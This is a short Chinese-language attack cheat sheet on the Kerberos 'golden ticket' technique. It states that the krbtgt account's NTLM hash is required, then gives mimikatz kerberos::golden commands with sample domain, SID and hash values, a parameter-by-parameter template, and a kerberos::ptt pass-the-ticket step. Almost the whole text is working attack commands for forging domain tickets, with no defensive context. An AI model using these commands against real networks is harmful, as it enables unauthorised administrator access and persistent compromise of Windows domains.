黄金票据

条件

• 获取krbtgt账户的ntlm hash

利用

• mimikatz制作黄金票据

  kerberos::golden /user:administrator /domain:zdc.fbi.gov /sid:S-1-5-21-3284156963-3292749774-3580691464 /krbtgt:d17e8847e6e756fbe3654ffb8eb68bdc /ticket:test.kirbi
  
  # kerberos::golden /user:<伪造的用户> /domain:<域> /sid:<域sid,用户sid去掉最后一部分> /krbtgt:<krbtgt ntlm hash> /ticket:test.kirbi
  
  kerberos::ptt test.kirbi
  # 传递票据